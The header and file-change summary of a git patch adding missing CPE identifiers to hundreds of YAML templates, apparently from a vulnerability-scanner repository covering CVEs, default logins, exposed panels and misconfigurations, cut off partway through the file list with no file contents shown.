From 33f6932472c6e512388e03ca677f46bceff2ca12 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 10 Sep 2024 13:52:50 +0530 Subject: [PATCH 1/3] Add missing cpes Added missing cpes --- http/cnvd/2020/CNVD-2020-63964.yaml | 6 +- http/cnvd/2021/CNVD-2021-14536.yaml | 5 +- http/cnvd/2021/CNVD-2021-15822.yaml | 6 +- http/cnvd/2021/CNVD-2021-28277.yaml | 5 +- http/cnvd/2021/CNVD-2021-33202.yaml | 6 +- http/cnvd/2022/CNVD-2022-42853.yaml | 3 + http/cnvd/2022/CNVD-2022-43245.yaml | 4 + http/cnvd/2024/CNVD-2024-15077.yaml | 6 +- .../self-hosted/grafana-login-check.yaml | 6 +- http/cves/2021/CVE-2021-27748.yaml | 5 +- http/cves/2022/CVE-2022-29299.yaml | 5 +- http/cves/2023/CVE-2023-1434.yaml | 5 +- http/cves/2023/CVE-2023-24367.yaml | 5 +- http/cves/2023/CVE-2023-32117.yaml | 5 +- http/cves/2023/CVE-2023-34020.yaml | 5 +- http/cves/2023/CVE-2023-42344.yaml | 6 +- http/cves/2023/CVE-2023-47115.yaml | 5 +- http/cves/2023/CVE-2023-47218.yaml | 5 +- http/cves/2023/CVE-2023-48777.yaml | 5 +- http/cves/2024/CVE-2024-1071.yaml | 5 +- http/cves/2024/CVE-2024-1183.yaml | 5 +- http/cves/2024/CVE-2024-1380.yaml | 5 +- http/cves/2024/CVE-2024-1561.yaml | 5 +- http/cves/2024/CVE-2024-1698.yaml | 5 +- http/cves/2024/CVE-2024-20767.yaml | 5 +- http/cves/2024/CVE-2024-21683.yaml | 5 +- http/cves/2024/CVE-2024-23163.yaml | 4 +- http/cves/2024/CVE-2024-24809.yaml | 5 +- http/cves/2024/CVE-2024-27199.yaml | 5 +- http/cves/2024/CVE-2024-27564.yaml | 6 +- http/cves/2024/CVE-2024-29269.yaml | 5 +- http/cves/2024/CVE-2024-29868.yaml | 5 +- http/cves/2024/CVE-2024-3136.yaml | 5 +- http/cves/2024/CVE-2024-31850.yaml | 5 +- http/cves/2024/CVE-2024-32113.yaml | 5 +- http/cves/2024/CVE-2024-32399.yaml | 5 +- http/cves/2024/CVE-2024-32709.yaml | 5 +- http/cves/2024/CVE-2024-3274.yaml | 5 +- http/cves/2024/CVE-2024-33113.yaml | 5 +- http/cves/2024/CVE-2024-33288.yaml | 6 +- http/cves/2024/CVE-2024-33605.yaml | 5 +- http/cves/2024/CVE-2024-34102.yaml | 5 +- http/cves/2024/CVE-2024-34982.yaml | 6 +- http/cves/2024/CVE-2024-3552.yaml | 6 +- http/cves/2024/CVE-2024-36104.yaml | 5 +- http/cves/2024/CVE-2024-36837.yaml | 6 +- http/cves/2024/CVE-2024-37032.yaml | 6 +- http/cves/2024/CVE-2024-37152.yaml | 6 +- http/cves/2024/CVE-2024-38288.yaml | 5 +- http/cves/2024/CVE-2024-38289.yaml | 6 +- http/cves/2024/CVE-2024-38856.yaml | 5 +- http/cves/2024/CVE-2024-3922.yaml | 6 +- http/cves/2024/CVE-2024-39907.yaml | 5 +- http/cves/2024/CVE-2024-41107.yaml | 5 +- http/cves/2024/CVE-2024-43425.yaml | 5 +- http/cves/2024/CVE-2024-4348.yaml | 5 +- http/cves/2024/CVE-2024-4358.yaml | 6 +- http/cves/2024/CVE-2024-4434.yaml | 5 +- http/cves/2024/CVE-2024-4443.yaml | 5 +- http/cves/2024/CVE-2024-4885.yaml | 5 +- http/cves/2024/CVE-2024-5315.yaml | 5 +- http/cves/2024/CVE-2024-5522.yaml | 5 +- http/cves/2024/CVE-2024-6028.yaml | 5 +- http/cves/2024/CVE-2024-6396.yaml | 5 +- http/cves/2024/CVE-2024-6646.yaml | 5 +- http/cves/2024/CVE-2024-6670.yaml | 5 +- http/cves/2024/CVE-2024-6781.yaml | 6 +- http/cves/2024/CVE-2024-6782.yaml | 6 +- http/cves/2024/CVE-2024-6922.yaml | 6 +- .../abb/cs141-default-login.yaml | 5 +- .../default-logins/aem/aem-default-login.yaml | 3 + .../default-logins/aem/aem-felix-console.yaml | 3 + .../apache/apache-apollo-default-login.yaml | 6 +- .../apache/cloudstack-default-login.yaml | 6 +- .../dolphinscheduler-default-login.yaml | 3 + .../apache/karaf-default-login.yaml | 3 + .../apache/kylin-default-login.yaml | 4 + .../apache/ranger-default-login.yaml | 3 + .../apache/tomcat-default-login.yaml | 4 + .../apollo/apollo-default-login.yaml | 3 + .../asus/asus-rtn16-default-login.yaml | 6 +- .../azkaban/azkaban-default-login.yaml | 3 + .../barco-clickshare-default-login.yaml | 6 +- .../batflat/batflat-default-login.yaml | 4 + .../bloofoxcms-default-login.yaml | 4 + .../cobbler/hue-default-credential.yaml | 3 + .../couchdb/couchdb-default-login.yaml | 5 +- .../crushftp/crushftp-anonymous-login.yaml | 6 +- .../crushftp/crushftp-default-login.yaml | 6 +- .../dataease/dataease-default-login.yaml | 6 +- .../datahub-metadata-default-login.yaml | 3 + .../dataiku/dataiku-default-login.yaml | 3 + .../elasticsearch-default-login.yaml | 4 + .../esafenet-cdg-default-login.yaml | 4 + .../eurotel/etl3100-default-login.yaml | 4 + .../feiyuxing/feiyuxing-default-login.yaml | 4 + .../franklin-fueling-default-login.yaml | 4 + .../fuji-xerox/fuji-xerox-default-login.yaml | 7 +- .../geoserver/geoserver-default-login.yaml | 3 + .../gitblit/gitblit-default-login.yaml | 6 +- .../gitlab/gitlab-weak-login.yaml | 3 + .../grafana/grafana-default-login.yaml | 3 + .../huawei-HG532e-default-router-login.yaml | 3 + .../hybris/hybris-default-login.yaml | 3 + .../default-logins/ibm/imm-default-login.yaml | 5 +- .../idemia-biometrics-default-login.yaml | 5 +- .../ispconfig-hcp-default-login.yaml | 6 +- .../jboss/jboss-jbpm-default-login.yaml | 3 + .../jeedom/jeedom-default-login.yaml | 6 +- .../jellyfin/jellyfin-default-login.yaml | 5 +- .../jupyterhub/jupyterhub-default-login.yaml | 3 + .../kanboard-default-login.yaml | 3 + .../leostream/leostream-default-login.yaml | 3 + .../magnolia-default-login.yaml | 3 + .../mantisbt/mantisbt-anonymous-login.yaml | 6 +- .../mantisbt/mantisbt-default-credential.yaml | 5 +- .../minio/minio-default-login.yaml | 3 + .../mobotix/mobotix-default-login.yaml | 3 + .../nacos/nacos-default-login.yaml | 4 + .../nagios/nagiosxi-default-login.yaml | 3 + .../netflow/netflow-default-login.yaml | 6 +- .../node-red/nodered-default-login.yaml | 6 +- .../nsicg/nsicg-default-login.yaml | 3 + .../o2oa/o2oa-default-login.yaml | 4 + .../octobercms/octobercms-default-login.yaml | 3 + .../openemr/openemr-default-login.yaml | 3 + .../openmediavault-default-login.yaml | 3 + .../oracle/peoplesoft-default-login.yaml | 5 +- .../others/aruba-instant-default-login.yaml | 4 + .../inspur-clusterengine-default-login.yaml | 4 + .../others/opencats-default-login.yaml | 3 + .../phpmyadmin/phpmyadmin-default-login.yaml | 3 + .../powerjob-default-login.yaml | 4 + .../prtg/prtg-default-login.yaml | 3 + .../pyload/pyload-default-login.yaml | 4 + .../rainloop/rainloop-default-login.yaml | 7 +- .../default-logins/rconfig-default-login.yaml | 4 + .../riello/netman-default-login.yaml | 4 + .../rundeck/rundeck-default-login.yaml | 6 +- .../samsung-printer-default-login.yaml | 3 + .../seeddms/seeddms-default-login.yaml | 3 + .../softether-vpn-default-login.yaml | 8 +- .../sonarqube/sonarqube-default-login.yaml | 3 + .../splunk/splunk-default-login.yaml | 6 +- .../stackstorm/stackstorm-default-login.yaml | 3 + .../steve/steve-default-login.yaml | 3 + .../tiny-file-manager-default-login.yaml | 3 + .../tooljet/tooljet-default-login.yaml | 3 + .../versa/versa-flexvnf-default-login.yaml | 3 + http/default-logins/wazuh-default-login.yaml | 6 +- .../webmethod-integration-default-login.yaml | 6 +- http/default-logins/webmin-default-login.yaml | 3 + .../xnat/xnat-default-login.yaml | 3 + .../default-logins/xui/xui-default-login.yaml | 5 +- http/exposed-panels/acti-panel.yaml | 6 +- http/exposed-panels/acunetix-login.yaml | 5 +- http/exposed-panels/adguard-panel.yaml | 6 +- .../exposed-panels/aerohive-netconfig-ui.yaml | 3 + .../aircube-dashboard-panel.yaml | 5 +- http/exposed-panels/aircube-login.yaml | 5 +- http/exposed-panels/airos-panel.yaml | 62 +++++++------- .../ansible-semaphore-panel.yaml | 3 + .../apache/apache-apollo-panel.yaml | 6 +- http/exposed-panels/aptus-panel.yaml | 5 +- http/exposed-panels/argocd-login.yaml | 5 +- http/exposed-panels/aspcms-backend-panel.yaml | 6 +- http/exposed-panels/aspect-control-panel.yaml | 5 +- http/exposed-panels/asus-router-panel.yaml | 5 +- .../atlassian-bamboo-panel.yaml | 62 +++++++------- http/exposed-panels/atvise-login.yaml | 5 +- http/exposed-panels/audiobookshelf-panel.yaml | 6 +- http/exposed-panels/audiocodes-detect.yaml | 5 +- http/exposed-panels/authelia-panel.yaml | 6 +- http/exposed-panels/axigen-webadmin.yaml | 3 + http/exposed-panels/axigen-webmail.yaml | 3 + http/exposed-panels/azkaban-web-client.yaml | 3 + .../backpack/backpack-admin-panel.yaml | 5 +- http/exposed-panels/beyondtrust-panel.yaml | 5 +- .../beyondtrust-priv-panel.yaml | 6 +- http/exposed-panels/bigfix-login.yaml | 5 +- http/exposed-panels/biotime-panel.yaml | 5 +- http/exposed-panels/black-duck-panel.yaml | 5 +- http/exposed-panels/bonobo-server-panel.yaml | 6 +- .../busybox-repository-browser.yaml | 6 +- http/exposed-panels/c2/caldera-c2.yaml | 6 +- http/exposed-panels/casaos-panel.yaml | 5 +- .../exposed-panels/changedetection-panel.yaml | 6 +- http/exposed-panels/cisco-unity-panel.yaml | 6 +- .../cisco/cisco-ace-device-manager.yaml | 5 +- .../cisco/cisco-expressway-panel.yaml | 44 +++++----- .../cisco/cisco-telepresence.yaml | 5 +- http/exposed-panels/concourse-ci-panel.yaml | 5 +- http/exposed-panels/craftercms-panel.yaml | 44 +++++----- http/exposed-panels/cwp-webpanel.yaml | 5 +- http/exposed-panels/cyberchef-panel.yaml | 48 ++++++----- http/exposed-panels/dahua-web-panel.yaml | 5 +- http/exposed-panels/dataiku-panel.yaml | 5 +- http/exposed-panels/defectdojo-panel.yaml | 5 +- http/exposed-panels/dell-idrac.yaml | 5 +- .../dell-openmanager-login.yaml | 5 +- http/exposed-panels/dialogic-xms-console.yaml | 6 +- http/exposed-panels/directum-login.yaml | 5 +- http/exposed-panels/discuz-panel.yaml | 6 +- .../docebo-elearning-panel.yaml | 5 +- http/exposed-panels/dockge-panel.yaml | 42 +++++----- http/exposed-panels/dokuwiki-panel.yaml | 6 +- http/exposed-panels/doris-panel.yaml | 6 +- http/exposed-panels/dradis-pro-panel.yaml | 5 +- http/exposed-panels/eclipse-birt-panel.yaml | 5 +- http/exposed-panels/emqx-panel.yaml | 44 +++++----- http/exposed-panels/ems-webclient-panel.yaml | 5 +- .../endpoint-protector-panel.yaml | 6 +- http/exposed-panels/episerver-panel.yaml | 5 +- http/exposed-panels/ez-publish-panel.yaml | 5 +- http/exposed-panels/faraday-login.yaml | 5 +- http/exposed-panels/footprints-panel.yaml | 5 +- .../fortinet/forticlientems-panel.yaml | 6 +- .../fortinet/fortinet-panel.yaml | 5 +- .../fortinet/fortisiem-panel.yaml | 6 +- http/exposed-panels/fossbilling-panel.yaml | 8 +- http/exposed-panels/freshrss-panel.yaml | 6 +- http/exposed-panels/gargoyle-router.yaml | 5 +- http/exposed-panels/gespage-panel.yaml | 5 +- http/exposed-panels/ghost-panel.yaml | 6 +- .../gira-homeserver-homepage.yaml | 5 +- http/exposed-panels/goanywhere-mft-login.yaml | 5 +- http/exposed-panels/gocron-panel.yaml | 5 +- http/exposed-panels/gophish-login.yaml | 5 +- .../gradle/gradle-develocity-panel.yaml | 6 +- http/exposed-panels/graphite-browser.yaml | 5 +- http/exposed-panels/graylog-panel.yaml | 6 +- .../hivemanager-login-panel.yaml | 5 +- http/exposed-panels/home-assistant-panel.yaml | 5 +- http/exposed-panels/huawei-hg532e-panel.yaml | 5 +- http/exposed-panels/ibm/ibm-odm-panel.yaml | 6 +- http/exposed-panels/intelbras-login.yaml | 5 +- http/exposed-panels/isams-panel.yaml | 6 +- http/exposed-panels/issabel-login.yaml | 5 +- http/exposed-panels/jamf-login.yaml | 5 +- http/exposed-panels/jamf-panel.yaml | 5 +- http/exposed-panels/jamf-setup-assistant.yaml | 5 +- http/exposed-panels/jfrog-login.yaml | 5 +- http/exposed-panels/joget/joget-panel.yaml | 5 +- http/exposed-panels/jorani-panel.yaml | 5 +- http/exposed-panels/jsherp-boot-panel.yaml | 6 +- http/exposed-panels/jumpserver-panel.yaml | 17 ++-- http/exposed-panels/jupyter-notebook.yaml | 5 +- http/exposed-panels/kerio-connect-client.yaml | 5 +- http/exposed-panels/kiali-panel.yaml | 6 +- http/exposed-panels/kkfileview-panel.yaml | 5 +- http/exposed-panels/koel-panel.yaml | 44 +++++----- http/exposed-panels/kopano-webapp-panel.yaml | 6 +- http/exposed-panels/kubernetes-mirantis.yaml | 5 +- http/exposed-panels/label-studio-panel.yaml | 6 +- http/exposed-panels/lancom-router-panel.yaml | 5 +- .../ldap-account-manager-panel.yaml | 5 +- http/exposed-panels/leostream-panel.yaml | 5 +- http/exposed-panels/librephotos-panel.yaml | 6 +- http/exposed-panels/mach-proweb-login.yaml | 5 +- http/exposed-panels/machform-admin-panel.yaml | 5 +- http/exposed-panels/magnolia-panel.yaml | 5 +- http/exposed-panels/minio-console.yaml | 5 +- http/exposed-panels/mitel-micollab-panel.yaml | 6 +- .../mobile-management-panel.yaml | 5 +- http/exposed-panels/mobileiron-sentry.yaml | 6 +- http/exposed-panels/mongodb-ops-manager.yaml | 5 +- http/exposed-panels/monitorr-panel.yaml | 6 +- .../moodle-workplace-panel.yaml | 6 +- http/exposed-panels/mylittleadmin-panel.yaml | 5 +- http/exposed-panels/mylittlebackup-panel.yaml | 5 +- http/exposed-panels/n8n-panel.yaml | 40 +++++---- http/exposed-panels/ncentral-panel.yaml | 5 +- http/exposed-panels/nconf-panel.yaml | 5 +- .../netflow-analyzer-panel.yaml | 6 +- http/exposed-panels/nginx-proxy-manager.yaml | 5 +- http/exposed-panels/nocodb-panel.yaml | 44 +++++----- http/exposed-panels/novnc-login-panel.yaml | 5 +- http/exposed-panels/nport-web-console.yaml | 5 +- http/exposed-panels/nuxeo-platform-panel.yaml | 5 +- http/exposed-panels/ocs-inventory-login.yaml | 5 +- http/exposed-panels/ollama-llm-panel.yaml | 5 +- http/exposed-panels/omniampx-panel.yaml | 5 +- http/exposed-panels/openedge-panel.yaml | 62 +++++++------- http/exposed-panels/opengear-panel.yaml | 5 +- http/exposed-panels/openvas-panel.yaml | 44 +++++----- .../oracle-ebusiness-panel.yaml | 50 +++++------ .../oracle-integrated-manager.yaml | 5 +- .../oracle-peoplesoft-panel.yaml | 5 +- http/exposed-panels/osnexus-panel.yaml | 5 +- .../outsystems-servicecenter-panel.yaml | 6 +- http/exposed-panels/passbolt-panel.yaml | 44 +++++----- .../payroll-management-system-panel.yaml | 5 +- http/exposed-panels/persis-panel.yaml | 5 +- http/exposed-panels/php-mailer.yaml | 5 +- http/exposed-panels/phpldapadmin-panel.yaml | 6 +- http/exposed-panels/phpminiadmin-panel.yaml | 5 +- http/exposed-panels/pichome-panel.yaml | 5 +- http/exposed-panels/posteio-admin-panel.yaml | 6 +- http/exposed-panels/powerjob-panel.yaml | 5 +- http/exposed-panels/privx-panel.yaml | 5 +- .../qlikview-accesspoint-panel.yaml | 36 ++++---- http/exposed-panels/qualcomm-voip-router.yaml | 5 +- http/exposed-panels/raspberrymatic-panel.yaml | 5 +- .../redhat/redhat-satellite-panel.yaml | 5 +- .../redis-enterprise-panel.yaml | 6 +- http/exposed-panels/redmine-panel.yaml | 30 ++++--- http/exposed-panels/remedy-axis-login.yaml | 5 +- http/exposed-panels/remkon-manager-panel.yaml | 5 +- http/exposed-panels/retool-login.yaml | 5 +- http/exposed-panels/rocketchat-panel.yaml | 6 +- http/exposed-panels/room-alert-detect.yaml | 5 +- http/exposed-panels/rundeck-login.yaml | 5 +- .../saltstack-config-panel.yaml | 5 +- .../scriptcase/scriptcase-panel.yaml | 6 +- .../scriptcase/scriptcase-prod-login.yaml | 6 +- http/exposed-panels/securepoint-utm.yaml | 5 +- http/exposed-panels/selenium-grid.yaml | 5 +- http/exposed-panels/shoutcast-server.yaml | 5 +- http/exposed-panels/sitecore-login.yaml | 5 +- http/exposed-panels/softether-vpn-panel.yaml | 6 +- http/exposed-panels/speedtest-panel.yaml | 6 +- http/exposed-panels/sqlbuddy-panel.yaml | 5 +- http/exposed-panels/steve-login-panel.yaml | 5 +- http/exposed-panels/supermicro-bmc-panel.yaml | 5 +- .../exposed-panels/suprema-biostar-panel.yaml | 6 +- http/exposed-panels/telerik-server-login.yaml | 5 +- http/exposed-panels/teltonika-login.yaml | 5 +- http/exposed-panels/temenos-t24-login.yaml | 5 +- .../tenda-11n-wireless-router-login.yaml | 5 +- http/exposed-panels/tibco-spotfire-panel.yaml | 6 +- http/exposed-panels/tigase-xmpp-server.yaml | 6 +- http/exposed-panels/tiny-rss-panel.yaml | 30 ++++--- http/exposed-panels/tooljet-panel.yaml | 5 +- .../uipath-orchestrator-panel.yaml | 44 +++++----- http/exposed-panels/unibox-panel.yaml | 6 +- http/exposed-panels/unifi-panel.yaml | 5 +- http/exposed-panels/uptime-kuma-panel.yaml | 6 +- http/exposed-panels/urbackup-panel.yaml | 6 +- http/exposed-panels/veeam-backup-gcp.yaml | 5 +- http/exposed-panels/verizon-router-panel.yaml | 5 +- .../versa/versa-director-login.yaml | 5 +- http/exposed-panels/vidyo-login.yaml | 5 +- http/exposed-panels/vinchin-panel.yaml | 5 +- .../vmware-cloud-availability.yaml | 5 +- http/exposed-panels/vmware-hcx-login.yaml | 5 +- http/exposed-panels/vmware-nsx-login.yaml | 5 +- .../vrealize-hyperic-login-panel.yaml | 5 +- .../wallix-accessmanager-panel.yaml | 5 +- http/exposed-panels/wampserver-homepage.yaml | 5 +- http/exposed-panels/web-file-manager.yaml | 5 +- http/exposed-panels/webpagetest-panel.yaml | 5 +- http/exposed-panels/webroot-login.yaml | 5 +- .../webtransfer-client-panel.yaml | 30 ++++--- http/exposed-panels/whatsup-gold-panel.yaml | 76 +++++++++-------- .../xiaomi-wireless-router-login.yaml | 5 +- http/exposed-panels/xibocms-login.yaml | 5 +- http/exposed-panels/xnat-login.yaml | 5 +- http/exposed-panels/xweb500-panel.yaml | 5 +- http/exposed-panels/yellowfin-panel.yaml | 6 +- http/exposed-panels/zblogphp-panel.yaml | 5 +- .../exposed-panels/zenml-dashboard-panel.yaml | 6 +- http/exposed-panels/zte-panel.yaml | 5 +- http/exposed-panels/zuul-panel.yaml | 5 +- .../zyxel/zyxel-firewall-panel.yaml | 5 +- http/exposures/apis/jeecg-boot-swagger.yaml | 6 +- http/exposures/apis/seafile-api.yaml | 4 + http/exposures/apis/strapi-page.yaml | 3 + .../backups/froxlor-database-backup.yaml | 3 + .../exposures/configs/accueil-wampserver.yaml | 3 + .../configs/babel-config-exposure.yaml | 3 + http/exposures/configs/cakephp-config.yaml | 5 +- .../exposures/configs/codeception-config.yaml | 4 + http/exposures/configs/dompdf-config.yaml | 5 +- .../configs/filestash-admin-config.yaml | 6 +- .../configs/ftp-credentials-exposure.yaml | 3 + .../configs/gcloud-config-default.yaml | 3 + http/exposures/configs/jkstatus-manager.yaml | 6 +- http/exposures/configs/karma-config-js.yaml | 3 + .../configs/magento-config-disclosure.yaml | 3 + .../exposures/configs/mercurial-hgignore.yaml | 5 +- .../configs/ovpn-config-exposed.yaml | 3 + http/exposures/configs/phpsys-info.yaml | 4 + .../configs/rakefile-disclosure.yaml | 4 + http/exposures/configs/redis-config.yaml | 3 + http/exposures/configs/rubocop-config.yaml | 3 + .../configs/sftp-credentials-exposure.yaml | 3 + http/exposures/configs/svnserve-config.yaml | 3 + http/exposures/configs/symfony-profiler.yaml | 5 +- .../configs/vbulletin-path-disclosure.yaml | 6 +- http/exposures/configs/webpack-config.yaml | 3 + http/exposures/configs/wgetrc-config.yaml | 3 + http/exposures/configs/yii-debugger.yaml | 6 +- http/exposures/files/angular-json.yaml | 4 + .../files/azure-pipelines-exposed.yaml | 6 +- http/exposures/files/bitbucket-pipelines.yaml | 4 + http/exposures/files/cargo-toml-file.yaml | 4 + .../files/cold-fusion-cfcache-map.yaml | 6 +- http/exposures/files/composer-auth-json.yaml | 6 +- http/exposures/files/django-secret-key.yaml | 4 + http/exposures/files/environment-rb.yaml | 6 +- .../files/get-access-token-json.yaml | 6 +- http/exposures/files/git-mailmap.yaml | 6 +- http/exposures/files/gitlab-ci-yml.yaml | 6 +- http/exposures/files/go-mod-disclosure.yaml | 6 +- http/exposures/files/gradle-libs.yaml | 4 + .../exposures/files/npm-cli-metrics-json.yaml | 6 +- .../files/npm-shrinkwrap-exposure.yaml | 4 + .../exposures/files/nuget-package-config.yaml | 4 + http/exposures/files/oracle-test-cgi.yaml | 4 + http/exposures/files/php-ini.yaml | 6 +- .../files/phpunit-result-cache-exposure.yaml | 6 +- .../files/pipeline-configuration.yaml | 4 + .../files/putty-private-key-disclosure.yaml | 6 +- http/exposures/files/redmine-config.yaml | 3 + http/exposures/files/redmine-settings.yaml | 4 + http/exposures/files/ruby-rail-storage.yaml | 6 +- http/exposures/files/secret-token-rb.yaml | 6 +- http/exposures/files/secrets-file.yaml | 6 +- http/exposures/files/sendgrid-env.yaml | 6 +- http/exposures/files/svn-wc-db.yaml | 6 +- .../files/symfony-properties-ini.yaml | 4 + http/exposures/files/symfony-security.yaml | 4 + http/exposures/files/token-info-json.yaml | 4 + http/exposures/files/uwsgi-ini.yaml | 4 + http/exposures/files/viminfo-disclosure.yaml | 4 + http/exposures/files/vscode-sftp.yaml | 4 + http/exposures/files/webpack-mix-js.yaml | 4 + http/exposures/files/wp-cli-exposure.yaml | 4 + http/exposures/files/ws-ftp-ini.yaml | 6 +- http/exposures/logs/fastcgi-echo.yaml | 4 + http/exposures/logs/npm-debug-log.yaml | 6 +- http/exposures/logs/npm-log-file.yaml | 6 +- http/exposures/logs/opentsdb-status.yaml | 6 +- .../exposures/logs/redis-exception-error.yaml | 6 +- http/exposures/logs/teampass-ldap.yaml | 5 +- http/exposures/logs/ws-ftp-log.yaml | 6 +- http/exposures/logs/yii-error-page.yaml | 6 +- http/exposures/tokens/jwk-json-leak.yaml | 6 +- http/iot/automation-direct.yaml | 3 + .../iot/grandstream-device-configuration.yaml | 6 +- http/iot/honeywell-building-control.yaml | 6 +- http/iot/hp-color-laserjet-detect.yaml | 6 +- http/iot/hue-personal-wireless-panel.yaml | 6 +- http/iot/loytec-device.yaml | 6 +- http/iot/octoprint-3dprinter-detect.yaml | 3 + http/iot/zebra-printer-detect.yaml | 6 +- .../exposed-file-upload-form.yaml | 6 +- http/miscellaneous/microsoft-azure-error.yaml | 6 +- .../netflix-conductor-version.yaml | 6 +- http/misconfiguration/aem/aem-acs-common.yaml | 6 +- http/misconfiguration/aem/aem-bg-servlet.yaml | 4 + http/misconfiguration/aem/aem-bulkeditor.yaml | 4 + .../aem/aem-cached-pages.yaml | 6 +- .../aem/aem-childrenlist-xss.yaml | 3 + http/misconfiguration/aem/aem-crx-bypass.yaml | 4 + .../aem/aem-crx-namespace.yaml | 6 +- http/misconfiguration/aem/aem-crx-search.yaml | 4 + .../aem/aem-custom-script.yaml | 4 + .../aem/aem-debugging-libraries.yaml | 4 + .../aem/aem-default-get-servlet.yaml | 6 +- http/misconfiguration/aem/aem-disk-usage.yaml | 6 +- .../aem/aem-dump-contentnode.yaml | 6 +- .../aem/aem-explorer-nodetypes.yaml | 6 +- .../aem/aem-external-link-checker.yaml | 4 + .../misconfiguration/aem/aem-gql-servlet.yaml | 6 +- .../aem/aem-groovyconsole.yaml | 4 + .../aem/aem-hash-querybuilder.yaml | 6 +- .../aem/aem-login-status.yaml | 4 + .../aem/aem-merge-metadata-servlet.yaml | 4 + .../aem/aem-offloading-browser.yaml | 6 +- .../aem/aem-osgi-bundles.yaml | 6 +- .../aem-querybuilder-internal-path-read.yaml | 6 +- .../aem/aem-querybuilder-json-servlet.yaml | 4 + .../aem/aem-setpreferences-xss.yaml | 3 + .../aem/aem-sling-userinfo.yaml | 4 + .../aem/aem-userinfo-servlet.yaml | 6 +- .../airflow/airflow-debug.yaml | 6 +- .../airflow/unauthenticated-airflow.yaml | 6 +- .../ampache-update-exposure.yaml | 6 +- .../apache-drill-exposure.yaml | 6 +- .../misconfiguration/apache-druid-unauth.yaml | 6 +- http/misconfiguration/apache-impala.yaml | 6 +- .../apache-struts-showcase.yaml | 6 +- .../apache/apache-nifi-unauth.yaml | 3 + .../apache/apache-zeppelin-unauth.yaml | 3 + .../apollo-adminservice-unauth.yaml | 3 + .../misconfiguration/apple-cups-exposure.yaml | 6 +- .../atlassian-bamboo-build.yaml | 4 + .../misconfiguration/aws/aws-s3-explorer.yaml | 3 + .../bitbucket-auth-bypass.yaml | 4 + .../bitbucket-public-repository.yaml | 6 +- .../bootstrap-admin-panel-template.yaml | 3 + .../browserless-debugger.yaml | 4 + .../casdoor-users-password.yaml | 6 +- http/misconfiguration/chatgpt-web-unauth.yaml | 6 +- .../clickhouse-unauth-api.yaml | 6 +- .../codeigniter-errorpage.yaml | 6 +- http/misconfiguration/codemeter-webadmin.yaml | 6 +- .../confluence/confluence-oauth-admin.yaml | 4 + .../misconfiguration/debug/ampache-debug.yaml | 4 + http/misconfiguration/debug/bottle-debug.yaml | 4 + .../debug/flask-werkzeug-debug.yaml | 6 +- http/misconfiguration/debug/github-debug.yaml | 4 + .../dgraph-dashboard-exposure.yaml | 3 + .../dlink-unauth-cgi-script.yaml | 6 +- .../docmosis-tornado-server.yaml | 6 +- .../drupal/drupal-user-enum-redirect.yaml | 4 + http/misconfiguration/elasticsearch.yaml | 6 +- .../envoy-admin-exposure.yaml | 6 +- http/misconfiguration/esphome-dashboard.yaml | 4 + http/misconfiguration/everything-listing.yaml | 4 + .../misconfiguration/feiyuxing-info-leak.yaml | 4 + http/misconfiguration/freshrss-unauth.yaml | 6 +- .../fusionauth-admin-setup.yaml | 6 +- .../ganglia-cluster-dashboard.yaml | 4 + http/misconfiguration/git-web-interface.yaml | 6 +- .../misconfiguration/gitea-public-signup.yaml | 6 +- .../gitlab/gitlab-public-repos.yaml | 4 + .../gitlab/gitlab-public-signup.yaml | 6 +- http/misconfiguration/gitlist-disclosure.yaml | 6 +- .../global-traffic-statistics.yaml | 6 +- .../gocd/gocd-cruise-configuration.yaml | 6 +- .../gocd/gocd-encryption-key.yaml | 6 +- .../gocd/gocd-unauth-dashboard.yaml | 6 +- .../grafana-public-signup.yaml | 6 +- .../graphql/graphql-alias-batching.yaml | 4 + .../graphql/graphql-playground.yaml | 4 + .../misconfiguration/grav-register-admin.yaml | 6 +- .../h2o/h2o-arbitary-file-read.yaml | 5 +- http/misconfiguration/h2o/h2o-dashboard.yaml | 6 +- .../haproxy-exporter-metrics.yaml | 6 +- .../helm-dashboard-exposure.yaml | 6 +- http/misconfiguration/hfs-exposure.yaml | 4 + .../hp/unauthorized-printer-hp.yaml | 6 +- .../ibm-friendly-path-exposure.yaml | 6 +- http/misconfiguration/imgproxy-unauth.yaml | 37 +++++---- .../installer/activecollab-installer.yaml | 6 +- .../installer/adguard-installer.yaml | 6 +- .../installer/alma-installer.yaml | 6 +- .../installer/ampache-music-installer.yaml | 6 +- .../atlassian-bamboo-setup-wizard.yaml | 6 +- .../installer/avideo-install.yaml | 5 +- .../installer/bagisto-installer.yaml | 6 +- .../installer/bitrix24-installer.yaml | 6 +- .../installer/call-com-installer.yaml | 6 +- .../installer/chamilo-installer.yaml | 6 +- .../installer/circarlife-setup.yaml | 3 + .../installer/clipbucket-installer.yaml | 6 +- .../installer/cloudcenter-Installer.yaml | 6 +- .../installer/codeigniter-installer.yaml | 6 +- .../installer/combodo-itop-installer.yaml | 6 +- .../installer/concrete-installer.yaml | 6 +- .../installer/connectwise-setup.yaml | 6 +- .../installer/custom-xoops-installer.yaml | 6 +- .../installer/discourse-installer.yaml | 6 +- .../installer/dokuwiki-installer.yaml | 6 +- .../installer/dolibarr-installer.yaml | 6 +- .../installer/dolphin-installer.yaml | 6 +- .../installer/ejbca-enterprise-installer.yaml | 6 +- .../installer/elgg-install.yaml | 6 +- .../installer/eshop-installer.yaml | 6 +- .../installer/espocrm-installer.yaml | 6 +- .../installer/facturascripts-installer.yaml | 6 +- .../installer/flarum-installer.yaml | 6 +- .../installer/fossbilling-installer.yaml | 8 +- .../installer/freshrss-installer.yaml | 6 +- .../installer/froxlor-installer.yaml | 6 +- .../installer/gitea-installer.yaml | 6 +- .../installer/glpi-installer.yaml | 6 +- .../installer/gogs-installer.yaml | 3 + .../installer/growi-installer.yaml | 6 +- .../installer/impresspages-installer.yaml | 6 +- .../installer/jira-setup.yaml | 6 +- .../installer/joomla-installer.yaml | 6 +- .../installer/knowledgetree-installer.yaml | 6 +- .../installer/kodbox-installer.yaml | 6 +- .../installer/librenms-installer.yaml | 6 +- .../installer/limesurvey-installer.yaml | 6 +- .../installer/lychee-installer.yaml | 6 +- .../installer/magento-installer.yaml | 6 +- .../installer/magnolia-installer.yaml | 6 +- .../installer/mantisbt-installer.yaml | 6 +- .../installer/matomo-installer.yaml | 6 +- .../installer/mautic-installer.yaml | 6 +- .../installer/monstra-installer.yaml | 6 +- .../installer/moodle-installer.yaml | 6 +- .../installer/moosocial-installer.yaml | 6 +- .../installer/mosparo-install.yaml | 6 +- .../installer/mura-cms-setup-installer.yaml | 6 +- 